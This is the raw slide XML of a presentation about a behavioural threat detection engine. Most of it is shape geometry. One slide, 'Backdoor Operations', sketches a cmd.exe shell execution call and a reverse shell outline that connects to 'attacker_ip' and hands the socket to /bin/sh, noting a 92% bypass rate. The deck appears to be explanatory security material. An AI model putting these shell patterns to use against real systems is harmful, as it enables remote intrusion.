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12192000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="MiSans" panose="020B0604020202020204" charset="-122"/>
      <p:regular r:id="rId15"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Liter" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId16"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Quattrocento Sans" panose="020B0502050000020003" pitchFamily="3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3965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-blog.csdnimg.cn/7b3c581b17e2a981d4871b679ff4f2d7204c2dbe.jpeg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="30000"/>
          </a:blip>
          <a:srcRect t="41" b="4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85098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Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="408146"/>
            <a:ext cx="3057525" cy="495300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3057525" h="495300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3057525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3057525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Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="408146"/>
            <a:ext cx="38100" cy="495300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="38100" h="495300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38100" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4953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647700" y="560546"/>
            <a:ext cx="267021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kern="0" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0A45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THREAT DETECTION SYSTEM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81000" y="1208246"/>
            <a:ext cx="11887200" cy="274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BEHAVIORAL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ANALYSIS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ENGINE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1000" y="4256246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381000" y="4599147"/>
            <a:ext cx="7458075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Threat Detection Through</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250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Behavioral Pattern Recognition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1000" y="5558790"/>
            <a:ext cx="11430000" cy="7620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11430000" h="7620">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11430000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11430000" y="7620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4A4F59">
              <a:alpha val="4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Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="58674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8100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="571500" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="592528" y="0"/>
                  <a:pt x="609600" y="17072"/>
                  <a:pt x="609600" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="609600" y="571500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="609600" y="592528"/>
                  <a:pt x="592528" y="609600"/>
                  <a:pt x="571500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Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545306" y="602932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142875" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="145442" y="0"/>
                  <a:pt x="148010" y="558"/>
                  <a:pt x="150354" y="1619"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="255501" y="46211"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="267779" y="51402"/>
                  <a:pt x="276932" y="63512"/>
                  <a:pt x="276876" y="78135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="276597" y="133499"/>
                  <a:pt x="253826" y="234795"/>
                  <a:pt x="157665" y="280839"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="148344" y="285304"/>
                  <a:pt x="137517" y="285304"/>
                  <a:pt x="128197" y="280839"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31979" y="234795"/>
                  <a:pt x="9265" y="133499"/>
                  <a:pt x="8985" y="78135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8930" y="63512"/>
                  <a:pt x="18083" y="51402"/>
                  <a:pt x="30361" y="46211"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="135452" y="1619"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="137796" y="558"/>
                  <a:pt x="140308" y="0"/>
                  <a:pt x="142875" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="142875" y="37281"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="142875" y="248301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219894" y="211020"/>
                  <a:pt x="240599" y="128420"/>
                  <a:pt x="241102" y="78972"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="142875" y="37337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142875" y="37337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10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="5905500"/>
            <a:ext cx="1590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1E3E6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CLASSIFICATION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143000" y="6172200"/>
            <a:ext cx="1609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1E3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Threat Intelligence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0295216" y="5905500"/>
            <a:ext cx="15144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30000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E1E3E6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CONFIDENCE LEVEL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276166" y="6172200"/>
            <a:ext cx="1533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500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0A45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1265" y="353391"/>
            <a:ext cx="64253" cy="514024"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="64253" h="514024">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="64253" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64253" y="514024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="514024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Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514024" y="321265"/>
            <a:ext cx="2746814" cy="192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2" b="1" kern="0" spc="10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Category 07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14024" y="578277"/>
            <a:ext cx="2827130" cy="3212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77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Backdoor Operations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14024" y="1028047"/>
            <a:ext cx="11428996" cy="224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8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Remote access and command shell execution enabling interactive attacker control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37328" y="1381439"/>
            <a:ext cx="3750767" cy="3943526"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3750767" h="3943526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3750767" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3750767" y="3943526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3943526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337328" y="1381439"/>
            <a:ext cx="32126" cy="3943526"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32126" h="3943526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32126" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32126" y="3943526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3943526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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481897" y="1509945"/>
            <a:ext cx="321265" cy="321265"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="321265" h="321265">
                <a:moveTo>
                  <a:pt x="32126" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="289138" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="306869" y="0"/>
                  <a:pt x="321265" y="14395"/>
                  <a:pt x="321265" y="32126"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="321265" y="289138"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="321265" y="306869"/>
                  <a:pt x="306869" y="321265"/>
                  <a:pt x="289138" y="321265"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32126" y="321265"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14395" y="321265"/>
                  <a:pt x="0" y="306869"/>
                  <a:pt x="0" y="289138"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32126"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14395"/>
                  <a:pt x="14395" y="0"/>
                  <a:pt x="32126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Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562213" y="1590261"/>
            <a:ext cx="160632" cy="160632"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="160632" h="160632">
                <a:moveTo>
                  <a:pt x="2949" y="37209"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-973" y="33287"/>
                  <a:pt x="-973" y="26918"/>
                  <a:pt x="2949" y="22997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6871" y="19075"/>
                  <a:pt x="13240" y="19075"/>
                  <a:pt x="17161" y="22997"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="67359" y="73194"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="71281" y="77116"/>
                  <a:pt x="71281" y="83485"/>
                  <a:pt x="67359" y="87407"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17161" y="137604"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13240" y="141526"/>
                  <a:pt x="6871" y="141526"/>
                  <a:pt x="2949" y="137604"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-973" y="133683"/>
                  <a:pt x="-973" y="127314"/>
                  <a:pt x="2949" y="123392"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="46025" y="80316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2949" y="37209"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="70277" y="120474"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="150593" y="120474"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="156146" y="120474"/>
                  <a:pt x="160632" y="124961"/>
                  <a:pt x="160632" y="130514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160632" y="136067"/>
                  <a:pt x="156146" y="140553"/>
                  <a:pt x="150593" y="140553"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="70277" y="140553"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="64724" y="140553"/>
                  <a:pt x="60237" y="136067"/>
                  <a:pt x="60237" y="130514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60237" y="124961"/>
                  <a:pt x="64724" y="120474"/>
                  <a:pt x="70277" y="120474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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899542" y="1558134"/>
            <a:ext cx="1196711" cy="224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Command Shell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81897" y="1927589"/>
            <a:ext cx="3477692" cy="867415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3477692" h="867415">
                <a:moveTo>
                  <a:pt x="32129" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3445563" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3463307" y="0"/>
                  <a:pt x="3477692" y="14385"/>
                  <a:pt x="3477692" y="32129"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3477692" y="835286"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3477692" y="853030"/>
                  <a:pt x="3463307" y="867415"/>
                  <a:pt x="3445563" y="867415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32129" y="867415"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14385" y="867415"/>
                  <a:pt x="0" y="853030"/>
                  <a:pt x="0" y="835286"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32129"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14385"/>
                  <a:pt x="14385" y="0"/>
                  <a:pt x="32129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10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578277" y="2023968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Shell Execution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578277" y="2216727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CreateProcess("cmd.exe",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78277" y="2377360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"/c " + command,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78277" y="2537992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..., &amp;pi);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81897" y="2891383"/>
            <a:ext cx="3541945" cy="5782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2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Spawns Windows command shells to execute attacker commands. Enables file system access, process manipulation, and reconnaissance operations.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481897" y="4675906"/>
            <a:ext cx="3477692" cy="6425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3477692" h="6425">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3477692" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3477692" y="6425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4A4F59">
              <a:alpha val="4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Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481897" y="4775504"/>
            <a:ext cx="3533913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Threat Level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481897" y="4968263"/>
            <a:ext cx="3549976" cy="224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8" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FB2C3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4230556" y="1381439"/>
            <a:ext cx="3750767" cy="3943526"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3750767" h="3943526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3750767" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3750767" y="3943526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3943526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Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230556" y="1381439"/>
            <a:ext cx="32126" cy="3943526"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32126" h="3943526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32126" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32126" y="3943526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3943526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Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375125" y="1509945"/>
            <a:ext cx="321265" cy="321265"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="321265" h="321265">
                <a:moveTo>
                  <a:pt x="32126" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="289138" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="306869" y="0"/>
                  <a:pt x="321265" y="14395"/>
                  <a:pt x="321265" y="32126"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="321265" y="289138"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="321265" y="306869"/>
                  <a:pt x="306869" y="321265"/>
                  <a:pt x="289138" y="321265"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32126" y="321265"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14395" y="321265"/>
                  <a:pt x="0" y="306869"/>
                  <a:pt x="0" y="289138"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32126"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14395"/>
                  <a:pt x="14395" y="0"/>
                  <a:pt x="32126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Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4455441" y="1590261"/>
            <a:ext cx="160632" cy="160632"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="160632" h="160632">
                <a:moveTo>
                  <a:pt x="157683" y="47249"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="127565" y="77367"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="124678" y="80253"/>
                  <a:pt x="120380" y="81101"/>
                  <a:pt x="116615" y="79532"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="112851" y="77963"/>
                  <a:pt x="110435" y="74324"/>
                  <a:pt x="110435" y="70277"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="110435" y="50198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10040" y="50198"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4486" y="50198"/>
                  <a:pt x="0" y="45711"/>
                  <a:pt x="0" y="40158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="34605"/>
                  <a:pt x="4486" y="30119"/>
                  <a:pt x="10040" y="30119"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="110435" y="30119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110435" y="10040"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="110435" y="5992"/>
                  <a:pt x="112882" y="2322"/>
                  <a:pt x="116647" y="753"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120412" y="-816"/>
                  <a:pt x="124710" y="63"/>
                  <a:pt x="127596" y="2918"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="157715" y="33036"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="161636" y="36958"/>
                  <a:pt x="161636" y="43327"/>
                  <a:pt x="157715" y="47249"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="33036" y="157683"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2918" y="127565"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-1004" y="123643"/>
                  <a:pt x="-1004" y="117274"/>
                  <a:pt x="2918" y="113353"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33036" y="83234"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="35923" y="80348"/>
                  <a:pt x="40221" y="79500"/>
                  <a:pt x="43986" y="81069"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47750" y="82638"/>
                  <a:pt x="50198" y="86309"/>
                  <a:pt x="50198" y="90356"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="50198" y="110435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150593" y="110435"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="156146" y="110435"/>
                  <a:pt x="160632" y="114921"/>
                  <a:pt x="160632" y="120474"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160632" y="126027"/>
                  <a:pt x="156146" y="130514"/>
                  <a:pt x="150593" y="130514"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="50198" y="130514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50198" y="150593"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="50198" y="154640"/>
                  <a:pt x="47750" y="158311"/>
                  <a:pt x="43986" y="159879"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40221" y="161448"/>
                  <a:pt x="35923" y="160570"/>
                  <a:pt x="33036" y="157715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Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4792769" y="1558134"/>
            <a:ext cx="1036079" cy="224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Reverse Shell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375125" y="1927589"/>
            <a:ext cx="3477692" cy="1028047"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3477692" h="1028047">
                <a:moveTo>
                  <a:pt x="32126" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3445565" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3463308" y="0"/>
                  <a:pt x="3477692" y="14384"/>
                  <a:pt x="3477692" y="32126"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3477692" y="995921"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3477692" y="1013664"/>
                  <a:pt x="3463308" y="1028047"/>
                  <a:pt x="3445565" y="1028047"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32126" y="1028047"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14384" y="1028047"/>
                  <a:pt x="0" y="1013664"/>
                  <a:pt x="0" y="995921"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32126"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14384"/>
                  <a:pt x="14384" y="0"/>
                  <a:pt x="32126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6" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4471504" y="2023968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Reverse Connection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471504" y="2216727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socket_connect(attacker_ip);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471504" y="2377360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dup2(sock, 0); // stdin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471504" y="2537992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dup2(sock, 1); // stdout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4471504" y="2698625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execve("/bin/sh", ...);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4375125" y="3052016"/>
            <a:ext cx="3541945" cy="5782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2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Creates outbound connections to attacker servers, bypassing firewall restrictions. Provides interactive shell access without listening ports.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4375125" y="4675906"/>
            <a:ext cx="3477692" cy="6425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3477692" h="6425">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3477692" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3477692" y="6425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4A4F59">
              <a:alpha val="4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Text 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375125" y="4775504"/>
            <a:ext cx="3533913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Bypass Rate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4375125" y="4968263"/>
            <a:ext cx="3549976" cy="224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8" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF69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92%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123784" y="1381439"/>
            <a:ext cx="3750767" cy="3943526"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3750767" h="3943526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3750767" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3750767" y="3943526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3943526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Shape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8123784" y="1381439"/>
            <a:ext cx="32126" cy="3943526"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32126" h="3943526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32126" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32126" y="3943526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3943526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7" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8268352" y="1509945"/>
            <a:ext cx="321265" cy="321265"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="321265" h="321265">
                <a:moveTo>
                  <a:pt x="32126" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="289138" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="306869" y="0"/>
                  <a:pt x="321265" y="14395"/>
                  <a:pt x="321265" y="32126"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="321265" y="289138"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="321265" y="306869"/>
                  <a:pt x="306869" y="321265"/>
                  <a:pt x="289138" y="321265"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32126" y="321265"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14395" y="321265"/>
                  <a:pt x="0" y="306869"/>
                  <a:pt x="0" y="289138"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32126"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14395"/>
                  <a:pt x="14395" y="0"/>
                  <a:pt x="32126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8" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8358708" y="1590261"/>
            <a:ext cx="140553" cy="160632"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="140553" h="160632">
                <a:moveTo>
                  <a:pt x="53649" y="-5020"/>
                </a:moveTo>
                <a:cubicBezTo>
